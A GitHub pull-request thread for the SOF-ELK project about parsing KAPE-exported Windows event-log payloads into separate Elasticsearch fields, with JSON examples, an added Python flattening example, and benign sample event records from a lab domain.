philhagen / sof-elk

Configuration files for the SOF-ELK VM
GNU General Public License v3.0

Update 6504-kape_evtxfiles.conf #259

Closed bedangSen closed 1 year ago

bedangSen commented 1 year ago

Changes to the configuration file to add the individual fields in the Event log payload as searchable fields in Elastic.

philhagen commented 1 year ago

Thanks, @bedangSen - this is an interesting approach that could benefit some other data files as well! Do you have a few log entries that the PR'ed config file breaks out as intended? (Redacted is fine, of course!) Thanks!

bedangSen commented 1 year ago

Hey @philhagen, would a screenshot work? Or are you looking for the raw Evtx file that was parsed?

Attaching a screenshot for reference if that helps.


philhagen commented 1 year ago

If you could copy-paste the original line(s) from the source file, that would be best. I run a bunch of tests and debugging traces before promoting parsers to production to be sure there are no regression errors.

bedangSen commented 1 year ago

Update: Adding a gsub filter to convert fields which have a field name but no field value into a key:value pair. For example, `{"name","field_key"}` to `{"field_key":"-"}`. This prevents the json filter from breaking.

For example:

```json
{"EventData":{"Data":[{"name":"VolumeGuid","text":"00000000-0000-0000-0000-000000000000"},{"name":"VolumeNameLength","text":"0"},{"name":"VolumeName"}]}}
```

Initially became:

```json
{"EventData":{"Data":[{"VolumeGuid":"00000000-0000-0000-0000-000000000000"},{"VolumeNameLength":"0"},{"VolumeName"}]}}
```

This would break the json filter since there is no value pair for "VolumeName".

The new update appends an empty value pair for such fields. For example:

```json
{"EventData":{"Data":[{"VolumeGuid":"00000000-0000-0000-0000-000000000000"},{"VolumeNameLength":"0"},{"VolumeName":"-"}]}}
```

Note: You may have to increase index.mapping.total_fields.limit to a higher value.

bedangSen commented 1 year ago

Update: Adding a gsub filter to break out the parent level of the JSON properly.

The following entries were still breaking:

```json
{"EventData":{"name":"TaskTerminationEvent","Data":[{"name":"TaskName","text":"\\{2c357fd5-8a7e-4058-a5fb-915cb023e920}"},{"name":"InstanceId","text":"ce175574-18b2-4086-ab3e-f99e98b6ba90"}]}}
{"EventData":{"name":"TMP_EVENT_TIME_SOURCE_REACHABLE","Data":{"name":"TimeSource","text":"base-dc.shieldbase.lan (ntp.d|0.0.0.0:123->172.16.4.4:123)"}}}
```

This would end up getting pushed as the below in the previous commit:

```
{
    "EventData": {
        "TaskTerminationEvent",
        "Data": [
            {
                "name": "TaskName": "\\{2c357fd5-8a7e-4058-a5fb-915cb023e920}"
            },
            {
                "InstanceId": "ce175574-18b2-4086-ab3e-f99e98b6ba90"
            }
        ]
    }
}
```

New commit resolves this issue.

Note: I used the _jsonparsefailure tag to debug what was breaking the json filter.
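The reshaping that the PR's gsub filters do on the Payload text, written structurally in plain Python as an added example (not code from sof-elk, this PR, or Logstash). It covers the two edge cases raised above (a Data entry with a name but no value, and a parent-level name on EventData) and accepts both key styles seen on this page: "name"/"text" from the comment's examples and "@Name"/"#text" from the real EvtxECmd lines. The `EventName` field name and the sample lines are assumptions constructed for the example.

```python
"""Structural flattening of KAPE/EvtxECmd event payloads.

Added example for this PR discussion; not code from the sof-elk repository.
It performs, without regexes, the reshaping the PR's gsub filters apply to
the Payload text: each {name,text} Data entry becomes a {name: value} field,
a name with no value is written as "-", and a parent-level name on
EventData becomes its own field instead of an unkeyed bare string.
"""
import json

NAME_KEYS = ("name", "@Name")        # comment examples vs. real EvtxECmd output
TEXT_KEYS = ("text", "#text")
MISSING_VALUE = "-"                  # placeholder the PR writes for valueless fields
PARENT_NAME_FIELD = "EventName"      # assumed field name for EventData's own name


def _first_present(obj, keys, default=None):
    """Return the value of the first key in `keys` that exists in `obj`."""
    for key in keys:
        if key in obj:
            return obj[key]
    return default


def flatten_event_data(event_data):
    """Turn one EventData object into {field_name: value}.

    Data may be a list of {name,text} entries, a single such entry not
    wrapped in a list, or a free-text string (PowerShell 800 events).
    """
    flat = {}
    parent_name = _first_present(event_data, NAME_KEYS)
    if parent_name is not None:
        # Keep the parent-level name keyed, so it cannot break the JSON.
        flat[PARENT_NAME_FIELD] = parent_name
    data = event_data.get("Data")
    if isinstance(data, dict):
        data = [data]
    if isinstance(data, list):
        for entry in data:
            if not isinstance(entry, dict):
                continue
            name = _first_present(entry, NAME_KEYS)
            if name is None:
                continue
            # Name without a value: emit the placeholder so the key survives.
            flat[name] = _first_present(entry, TEXT_KEYS, MISSING_VALUE)
    elif isinstance(data, str):
        flat["Data"] = data
    return flat


def flatten_payload(payload_text):
    """Parse the Payload string of one EvtxECmd record and flatten it.

    Returns a tag mirroring Logstash's _jsonparsefailure when the payload
    is not valid JSON, so bad records can be found the way the PR did.
    """
    try:
        payload = json.loads(payload_text)
    except json.JSONDecodeError:
        return {"tags": ["_jsonparsefailure"]}
    if isinstance(payload.get("EventData"), dict):
        return flatten_event_data(payload["EventData"])
    # UserData events (e.g. WMI-Activity 5857) are already keyed by name.
    if isinstance(payload.get("UserData"), dict):
        flat = {}
        for section in payload["UserData"].values():
            if isinstance(section, dict):
                flat.update(section)
        return flat
    return {}


def flatten_record(line):
    """Flatten one EvtxECmd JSON line; Payload becomes a dict of fields."""
    record = json.loads(line)
    if isinstance(record.get("Payload"), str):
        record["Payload"] = flatten_payload(record["Payload"])
    return record


# Constructed samples based on the payloads quoted in this PR.
SAMPLE_VOLUME = r'{"EventData":{"Data":[{"name":"VolumeGuid","text":"00000000-0000-0000-0000-000000000000"},{"name":"VolumeNameLength","text":"0"},{"name":"VolumeName"}]}}'
SAMPLE_TASK = r'{"EventData":{"name":"TaskTerminationEvent","Data":[{"name":"TaskName","text":"\\{2c357fd5-8a7e-4058-a5fb-915cb023e920}"},{"name":"InstanceId","text":"ce175574-18b2-4086-ab3e-f99e98b6ba90"}]}}'
SAMPLE_TIME = r'{"EventData":{"name":"TMP_EVENT_TIME_SOURCE_REACHABLE","Data":{"name":"TimeSource","text":"base-dc.shieldbase.lan (ntp.d|0.0.0.0:123->172.16.4.4:123)"}}}'
# Constructed, shortened EvtxECmd line in the "@Name"/"#text" style.
SAMPLE_RECORD = r'{"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"WorkstationName\"}]}}","Channel":"Security","EventId":4624}'

if __name__ == "__main__":
    for sample in (SAMPLE_VOLUME, SAMPLE_TASK, SAMPLE_TIME):
        print(json.dumps(flatten_payload(sample)))
    print(json.dumps(flatten_record(SAMPLE_RECORD)))
```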

bedangSen commented 1 year ago

> If you could copy-paste the original line(s) from the source file, that would be best. I run a bunch of tests and debugging traces before promoting parsers to production to be sure there are no regression errors.

I hope the below helps:

{"ChunkNumber":160,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"    if (Test-Path $obj.ProfilePath) {\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=19\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=ee627473-0999-4c35-8c0b-facea2a123c0\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=b7f1bba6-4c21-44c1-99ba-f58aa81d59f3\\n\\tPipelineId=1\\n\\tScriptName=\\n\\tCommandLine=    if (Test-Path $obj.ProfilePath) {\\n, CommandInvocation(Test-Path): \\\"Test-Path\\\"\\nParameterBinding(Test-Path): name=\\\"Path\\\"; value=\\\"C:\\\\Users\\\\cbarton-a\\\\Documents\\\\WindowsPowershell\\\\Microsoft.Powershell_profile.ps1\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"4417","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:24:45.8372911+00:00","RecordNumber":4417}
{"ChunkNumber":241,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER73E7.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_09341a0e, 0, 218eba04-444b-4af0-b56a-2830deef1890, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"263016","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T20:52:22.3519990+00:00","RecordNumber":263016}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":412,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  \"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"38158","ProcessId":776,"ThreadId":9308,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-18T12:21:50.3865023+00:00","RecordNumber":38158}
{"ChunkNumber":219,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x2A8EACE\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"TB_0_microsoft.com\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"21311","ProcessId":744,"ThreadId":1328,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-06-22T06:55:45.3364468+00:00","RecordNumber":21311}
{"PayloadData1":"Task \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting","PayloadData3":"Instance Id f99a731e-9b33-4dde-9262-4d1b461808b4","ExecutableInfo":"%windir%\\system32\\wermgr.exe","MapDescription":"Scheduled task completed","ChunkNumber":151,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionSuccess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"f99a731e-9b33-4dde-9262-4d1b461808b4\"},{\"@Name\":\"ActionName\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ResultCode\",\"#text\":\"0\"},{\"@Name\":\"EnginePID\",\"#text\":\"18192\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":201,"EventRecordId":"198614","ProcessId":1484,"ThreadId":15328,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-30T03:31:13.8276952+00:00","RecordNumber":198614}
{"ChunkNumber":216,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"000001FDF21247B0: Key Machine for content: 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"KeyMachine::KeyMachine\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\keymachine.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"90\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272868","ProcessId":692,"ThreadId":8484,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T09:29:53.0850192+00:00","RecordNumber":272868}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":602,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  \"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"53971","ProcessId":772,"ThreadId":4760,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T11:05:25.0032744+00:00","RecordNumber":53971}
{"ChunkNumber":207,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Invoking license manager because license/lease polling time up: PFN Microsoft.WindowsFeedbackHub_1.1712.1141.0_x64__8wekyb3d8bbwe\"},{\"@Name\":\"Function\",\"#text\":\"InvokeLicenseManagerRequired\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\apisethost\\\\activationapis.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"331\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272000","ProcessId":5544,"ThreadId":860,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T05:44:24.5553864+00:00","RecordNumber":272000}
{"ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"10440","ProcessId":732,"ThreadId":4724,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T18:07:47.6528121+00:00","RecordNumber":10440}
{"PayloadData1":"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"shieldbase\\BASE-RD-01$ (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":376,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x968E862\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"35248","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-11T22:33:53.0234829+00:00","RecordNumber":35248}
{"PayloadData1":"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"NT AUTHORITY\\SYSTEM (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":404,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"37523","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-17T01:29:34.8951972+00:00","RecordNumber":37523}
{"ChunkNumber":1,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ProcessName\"},{\"@Name\":\"Type\",\"#text\":\"1\"},{\"@Name\":\"ErrorCode\",\"#text\":\"2147942403\"},{\"@Name\":\"File\",\"#text\":\"onecoreuap\\\\shell\\\\cloudstore\\\\store\\\\cache\\\\src\\\\cloudcacheinitializer.cpp\"},{\"@Name\":\"LineNumber\",\"#text\":\"178\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-CloudStore/Operational","Provider":"Microsoft-Windows-CloudStore","EventId":1,"EventRecordId":"2302","ProcessId":8,"ThreadId":14116,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-CloudStore%4Operational.evtx","TimeCreated":"2018-08-06T17:55:18.6402904+00:00","RecordNumber":2302}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"4\"},{\"@Name\":\"SubscriberName\",\"#text\":\"TermSrv\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":812,"EventRecordId":"564","ProcessId":688,"ThreadId":6188,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-05-25T17:29:26.7101098+00:00","RecordNumber":564}
{"ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"10344","ProcessId":732,"ThreadId":3588,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T17:08:15.0409049+00:00","RecordNumber":10344}
{"ChunkNumber":64,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"        Get-Date([datetime]::FromFileTimeUtc($LastWriteTime)) -Format yyyyMMddThh:mm:ss\\n, \\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=91\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=13f7ad71-b1ac-48a2-93d9-43430194a8db\\n\\tHostApplication=C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=e279666b-f78f-445b-ae11-b22357f63042\\n\\tPipelineId=1\\n\\tScriptName=\\n\\tCommandLine=        Get-Date([datetime]::FromFileTimeUtc($LastWriteTime)) -Format yyyyMMddThh:mm:ss\\n, CommandInvocation(Get-Date): \\\"Get-Date\\\"\\nParameterBinding(Get-Date): name=\\\"Format\\\"; value=\\\"yyyyMMddThh:mm:ss\\\"\\nParameterBinding(Get-Date): name=\\\"Date\\\"; value=\\\"5/7/2018 9:53:23 PM\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"2405","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:19:11.2802986+00:00","RecordNumber":2405}
{"ChunkNumber":36,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"UserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-500\"},{\"@Name\":\"MainPackageFullName\",\"#text\":\"Microsoft.ZuneMusic_2019.18071.11711.0_neutral_~_8wekyb3d8bbwe\"},{\"@Name\":\"ErrorCode\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-AppXDeploymentServer/Operational","Provider":"Microsoft-Windows-AppXDeployment-Server","EventId":821,"EventRecordId":"20634","ProcessId":15888,"ThreadId":11824,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx","TimeCreated":"2018-08-28T21:56:10.5588744+00:00","RecordNumber":20634}
{"PayloadData1":"Task \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting","PayloadData3":"Instance Id 417f1afd-fb23-41fe-b64e-aa40508b8238","ExecutableInfo":"%windir%\\system32\\wermgr.exe","MapDescription":"Scheduled task executed","ChunkNumber":178,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionStart\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"ActionName\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"417f1afd-fb23-41fe-b64e-aa40508b8238\"},{\"@Name\":\"EnginePID\",\"#text\":\"296\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":200,"EventRecordId":"201480","ProcessId":556,"ThreadId":4260,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-31T14:23:49.0829094+00:00","RecordNumber":201480}
{"ChunkNumber":31,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"270115","ProcessId":1100,"ThreadId":3476,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-31T11:31:10.2949536+00:00","RecordNumber":270115}
